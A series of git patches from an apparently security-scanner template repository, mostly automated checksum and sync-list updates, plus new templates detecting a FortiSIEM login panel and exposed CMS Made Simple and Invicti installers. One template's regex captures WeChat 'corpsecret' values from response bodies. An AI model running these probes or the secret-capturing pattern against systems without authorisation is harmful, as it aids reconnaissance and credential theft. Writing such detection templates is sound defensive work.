http/vulnerabilities/other/cerio-dt-rce.yaml From 216ae52f0a6d2362f18e496d31ae3a9e3ab102da Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 12:39:13 +0000 Subject: [PATCH 373/847] Auto Generated Templates Checksum [Tue May 28 12:39:13 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 159e8e8e13..1aaa7e73b8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5484,6 +5484,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 +http/misconfiguration/installer/projectsend-installer.yaml:a8c83ce196cece320aff9008a73055ed2cfbeae9 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 @@ -6981,7 +6982,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:163c42d19380ed74df154d367227f372929d032e +http/technologies/tech-detect.yaml:9a412a58865301201466e8d67a25407470b4a3b3 http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -8576,7 +8577,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b52d136fba4351a25542d30e38b49e40e39323d5 +templates-checksum.txt:c796c13e305b8137a623c7faaa20aa420baf2a6a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fe8986836c55682f41df38e7a15cc273f98b8755 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 12:39:55 +0000 Subject: [PATCH 374/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 391b388721..470ed76a77 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,6 +18,7 @@ on: - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From f5b830a70c123e34cedd8a597111f307814fbcd3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 12:40:09 +0000 Subject: [PATCH 375/847] Auto Generated New Template Addition List [Tue May 28 12:40:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 96659358aa..c25d534938 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml +http/misconfiguration/installer/stackposts-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 6bd92cf8347d603c58c59b79643280e2f1b85dbf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 12:40:20 +0000 Subject: [PATCH 376/847] Auto Generated Templates Checksum [Tue May 28 12:40:20 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1aaa7e73b8..bea2049b5b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5498,6 +5498,7 @@ http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d3 http/misconfiguration/installer/sms-installer.yaml:c9d601c3fcdab053214228580512c01923e6aeb3 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 +http/misconfiguration/installer/stackposts-installer.yaml:2fb3f671a7bcb4be5998f1e9db135239538e8448 http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcfaa5fa60f3a40ca http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc @@ -8577,7 +8578,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c796c13e305b8137a623c7faaa20aa420baf2a6a +templates-checksum.txt:ae68b3f460d77d21e9be5d91d1dca2b6dac96d43 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5c02a6433673f24a41ee57480a883cdc04a92616 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 12:40:39 +0000 Subject: [PATCH 377/847] Auto Template Signing [Tue May 28 12:40:39 UTC 2024] :robot: --- http/misconfiguration/installer/projectsend-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/projectsend-installer.yaml b/http/misconfiguration/installer/projectsend-installer.yaml index 4a0eef8ebb..63635f5412 100644 --- a/http/misconfiguration/installer/projectsend-installer.yaml +++ b/http/misconfiguration/installer/projectsend-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502210082f7bdb68807817103398c614e50dd995b73a28d7e5245ea50c8fab55682148e022024f583421998cfd85a5caabde87e48a0ea71e20ff6b13cdbda7f693308975892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 86c3bcafe7e290897435639329d292b7df84040d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 12:40:58 +0000 Subject: [PATCH 378/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 470ed76a77..7d29ae0745 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -19,6 +19,7 @@ on: - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' + - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From b27cedbdd3729dec7ed2618636742acb5a95a89b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 14:43:29 +0000 Subject: [PATCH 379/847] Auto Generated New Template Addition List [Tue May 28 14:43:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c25d534938..99b87b127d 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/exposures/tokens/wechat/wechat-secret-key.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml From 2fe073383f3b90de9f9e3ca8dc7468664c1847ec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 14:43:37 +0000 Subject: [PATCH 380/847] Auto Generated Templates Checksum [Tue May 28 14:43:37 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bea2049b5b..ecd4608e62 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5094,6 +5094,7 @@ http/exposures/tokens/truenas/truenas-api-key.yaml:6d4dc0b155d4712643709cf7ca297 http/exposures/tokens/twilio/twilio-api-key.yaml:47330462cb2543118a5a7364e3640207ec6743a5 http/exposures/tokens/twitter/twitter-client-id.yaml:c92de370ea212c866b8ebafe350c419de4396c78 http/exposures/tokens/twitter/twitter-secret-key.yaml:80a9e988a78092fb9f2d856018f6fdecfc44ea67 +http/exposures/tokens/wechat/wechat-secret-key.yaml:c084c1779c30ee4c681c3694d6bc59a00240340a http/exposures/tokens/wireguard/wireguard-preshared-key.yaml:b1b834fca36f5387b0992472dfc8e65ad7182add http/exposures/tokens/wireguard/wireguard-private-key.yaml:bdbd1193a2679747f217b7f189bc1681bc7ac2d4 http/exposures/tokens/zapier/zapier-webhook-token.yaml:2003b8aeff54e5608d7205ef0ce7d723022efe99 @@ -5484,7 +5485,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 -http/misconfiguration/installer/projectsend-installer.yaml:a8c83ce196cece320aff9008a73055ed2cfbeae9 +http/misconfiguration/installer/projectsend-installer.yaml:aa78d14c8384bd5355f0d504c5d73032eef9cc80 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 @@ -8578,7 +8579,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ae68b3f460d77d21e9be5d91d1dca2b6dac96d43 +templates-checksum.txt:21e631f5b2cb4128a1efae8498bae65ffa6c352f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 91dd994c63804a56029cf4e0c8a9f24ad0b765e9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 14:44:16 +0000 Subject: [PATCH 381/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7d29ae0745..35fde475e5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' From 01128069d37e1f321fe67e878775b31e5c626c59 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 14:45:20 +0000 Subject: [PATCH 382/847] Auto Template Signing [Tue May 28 14:45:20 UTC 2024] :robot: --- http/exposures/tokens/wechat/wechat-secret-key.yaml | 3 ++- http/misconfiguration/installer/stackposts-installer.yaml | 1 + 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/http/exposures/tokens/wechat/wechat-secret-key.yaml b/http/exposures/tokens/wechat/wechat-secret-key.yaml index 33ab8f6644..785d9ddaa3 100644 --- a/http/exposures/tokens/wechat/wechat-secret-key.yaml +++ b/http/exposures/tokens/wechat/wechat-secret-key.yaml @@ -20,4 +20,5 @@ http: - type: regex part: body regex: - - (?i)corpsecret\s*[:=]\s*["']?([a-z0-9\-]+)["']? \ No newline at end of file + - (?i)corpsecret\s*[:=]\s*["']?([a-z0-9\-]+)["']? +# digest: 4a0a00473045022100aef8483cbb936450af46573a3a83ca4f68539195274b15135643b579204a56fa02201c49a697c63fc9043f34278dcf93009b455fa061d5d32b424fdd3c4a5d26fa56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/stackposts-installer.yaml b/http/misconfiguration/installer/stackposts-installer.yaml index 08781a7f4a..9994a5aea1 100644 --- a/http/misconfiguration/installer/stackposts-installer.yaml +++ b/http/misconfiguration/installer/stackposts-installer.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100d0691e01d5b4670558a676902a7a350be1aaca4d572848212b576ba97bd998f5022063d7019e599581864ddb6b5a1a8b6ceeb2d8727af334d337ea27969a88c05740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f93f159e3bfb13be61d9ebfef756ce1e7ec5d9ab Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 28 May 2024 20:20:24 +0530 Subject: [PATCH 383/847] Create fortisiem-panel.yaml --- .../fortinet/fortisiem-panel.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/fortinet/fortisiem-panel.yaml diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml new file mode 100644 index 0000000000..2bbb829426 --- /dev/null +++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml @@ -0,0 +1,34 @@ +id: fortisiem-panel + +info: + name: FortiSIEM Login Panel - Detect + author: pussycat0x + severity: info + description: FortiSIEM login panel was detected. + metadata: + shodan-query: http.favicon.hash:-1341442175 + verified: true + tags: panel,fortisiem + +flow: http(1) && http(2) +http: + - method: GET + path: + - "{{BaseURL}}/phoenix/login.html" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "(\"426d365a42bbc67c092b9c2e49b336420f0559d1\" == sha1(body))" + condition: and + + - method: GET + path: + - "{{BaseURL}}/phoenix/js/login.min.js" + + matchers: + - type: word + words: + - "fortiSIEM_current_login_salt" From be9c5604cff4602c030f7016cd7f9d4521daa0f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 21:03:26 +0530 Subject: [PATCH 384/847] Create cms-made-simple-installer.yaml --- .../installer/cms-made-simple-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/cms-made-simple-installer.yaml diff --git a/http/misconfiguration/installer/cms-made-simple-installer.yaml b/http/misconfiguration/installer/cms-made-simple-installer.yaml new file mode 100644 index 0000000000..85a805cd0e --- /dev/null +++ b/http/misconfiguration/installer/cms-made-simple-installer.yaml @@ -0,0 +1,31 @@ +id: cms-made-simple-installer + +info: + name: CMS Made Simple Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed CMS Made Simple Installation page. + reference: + - https://www.cmsmadesimple.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"CMS Made Simple Install/Upgrade" + tags: misconfig,install,exposure,cms-made-simple + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CMS Made Simple Install/Upgrade" + + - type: status + status: + - 200 From da3a75075ce6a342d6839b8158033666a792ce43 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 16:35:00 +0000 Subject: [PATCH 385/847] Auto Generated New Template Addition List [Tue May 28 16:35:00 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 99b87b127d..63c8295176 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml +http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml From ac97ab6b8920ee8a7ce6b869c7f8241325ce8d09 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 16:35:05 +0000 Subject: [PATCH 386/847] Auto Generated Templates Checksum [Tue May 28 16:35:05 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ecd4608e62..f831f09a99 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5094,7 +5094,7 @@ http/exposures/tokens/truenas/truenas-api-key.yaml:6d4dc0b155d4712643709cf7ca297 http/exposures/tokens/twilio/twilio-api-key.yaml:47330462cb2543118a5a7364e3640207ec6743a5 http/exposures/tokens/twitter/twitter-client-id.yaml:c92de370ea212c866b8ebafe350c419de4396c78 http/exposures/tokens/twitter/twitter-secret-key.yaml:80a9e988a78092fb9f2d856018f6fdecfc44ea67 -http/exposures/tokens/wechat/wechat-secret-key.yaml:c084c1779c30ee4c681c3694d6bc59a00240340a +http/exposures/tokens/wechat/wechat-secret-key.yaml:70cf383050476626584c85aa1e297c7262a8b2db http/exposures/tokens/wireguard/wireguard-preshared-key.yaml:b1b834fca36f5387b0992472dfc8e65ad7182add http/exposures/tokens/wireguard/wireguard-private-key.yaml:bdbd1193a2679747f217b7f189bc1681bc7ac2d4 http/exposures/tokens/zapier/zapier-webhook-token.yaml:2003b8aeff54e5608d7205ef0ce7d723022efe99 @@ -5406,6 +5406,7 @@ http/misconfiguration/installer/chamilo-installer.yaml:a0c0b5aeeb609610b3c883600 http/misconfiguration/installer/circarlife-setup.yaml:a156b34f363e32ba5b727edf8e4c1334c8d7c49a http/misconfiguration/installer/clipbucket-installer.yaml:953b61e17da228a814a1ea84ac3ff2e0579a4804 http/misconfiguration/installer/cloudcenter-Installer.yaml:962ce42554b0a67568e837ed06e88025c78a610c +http/misconfiguration/installer/cms-made-simple-installer.yaml:b928a746fbe5cd2e551019a88715cbc797d71104 http/misconfiguration/installer/codeigniter-installer.yaml:fd1d80362d9f4c812f2a205c0db51bd4a970afc8 http/misconfiguration/installer/combodo-itop-installer.yaml:a7551d44c75895abdb04ecb2762433101a90a11e http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a221e3f9d836d7e402 @@ -5499,7 +5500,7 @@ http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d3 http/misconfiguration/installer/sms-installer.yaml:c9d601c3fcdab053214228580512c01923e6aeb3 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 -http/misconfiguration/installer/stackposts-installer.yaml:2fb3f671a7bcb4be5998f1e9db135239538e8448 +http/misconfiguration/installer/stackposts-installer.yaml:29af347900e7b1f9fd77a04fe02dfbf89020028f http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcfaa5fa60f3a40ca http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc @@ -8579,7 +8580,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:21e631f5b2cb4128a1efae8498bae65ffa6c352f +templates-checksum.txt:bc9e62dba93d4e247f4aa36b1ec2fd22620a75d1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c0f73ceaa8f124ea6a1cf74389638b511d05bd96 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 16:35:48 +0000 Subject: [PATCH 387/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 35fde475e5..da22c5fd86 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -16,6 +16,7 @@ on: - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' + - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' From 0f98533c8995a6ce5dcaf75a9cc1081d60f4a7f7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 16:36:23 +0000 Subject: [PATCH 388/847] Auto Generated New Template Addition List [Tue May 28 16:36:23 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 63c8295176..964b89e7cd 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-5230.yaml +http/default-logins/ampjuke-default-login.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml From be5ad5ed37632747bf93f05f8706812975dfa23c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 16:36:36 +0000 Subject: [PATCH 389/847] Auto Generated Templates Checksum [Tue May 28 16:36:36 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f831f09a99..4eeb1d9544 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3325,6 +3325,7 @@ http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc http/default-logins/allnet/allnet-default-login.yaml:bdc1b0fae7b08909a071f9b452800f8b37b4b2ea http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe +http/default-logins/ampjuke-default-login.yaml:dcd5fb3f7636832265548e0ab1c8d4dba89a11a4 http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 @@ -8580,7 +8581,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:bc9e62dba93d4e247f4aa36b1ec2fd22620a75d1 +templates-checksum.txt:c57bb8f7de4b36023acff4442e06229729d6ebc9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 46bda4148a42599b0717f34507c4c3cb2ab071f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 16:36:50 +0000 Subject: [PATCH 390/847] Auto Template Signing [Tue May 28 16:36:50 UTC 2024] :robot: --- http/misconfiguration/installer/cms-made-simple-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/cms-made-simple-installer.yaml b/http/misconfiguration/installer/cms-made-simple-installer.yaml index 85a805cd0e..0b7a9e40ec 100644 --- a/http/misconfiguration/installer/cms-made-simple-installer.yaml +++ b/http/misconfiguration/installer/cms-made-simple-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100ab7397bf22e61def290fd2775918114d25396aa0d5788b62d123f84492e0b8c10220695e11f4c8e0bd63a84e3a22f3c6c6f95fb2674adf8cf7bcdb065bcf3c5bdb90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 47acd7e49568c00a85a6ee308ae80e39492cebc4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 16:37:05 +0000 Subject: [PATCH 391/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index da22c5fd86..ea6701ee60 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' + - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' From 18d6fd7a4385e1d6357960844f29dcac37f51a6e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 23:31:41 +0530 Subject: [PATCH 392/847] Create invicti-enterprise-installer.yaml --- .../invicti-enterprise-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/invicti-enterprise-installer.yaml diff --git a/http/misconfiguration/installer/invicti-enterprise-installer.yaml b/http/misconfiguration/installer/invicti-enterprise-installer.yaml new file mode 100644 index 0000000000..97b5fd79e7 --- /dev/null +++ b/http/misconfiguration/installer/invicti-enterprise-installer.yaml @@ -0,0 +1,31 @@ +id: invicti-enterprise-installer + +info: + name: Invicti Enterprise Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Invicti Enterprise Installation page. + reference: + - https://www.invicti.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Invicti Enterprise - Installation Wizard" + tags: misconfig,install,exposure,invicti + +http: + - method: GET + path: + - "{{BaseURL}}/wizard/database/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Invicti Enterprise - Installation Wizard" + + - type: status + status: + - 200 From 0731835b4ab41a083d0292e9da48cc2565601db1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 23:35:33 +0530 Subject: [PATCH 393/847] Create ejbca-enterprise-installer.yaml --- 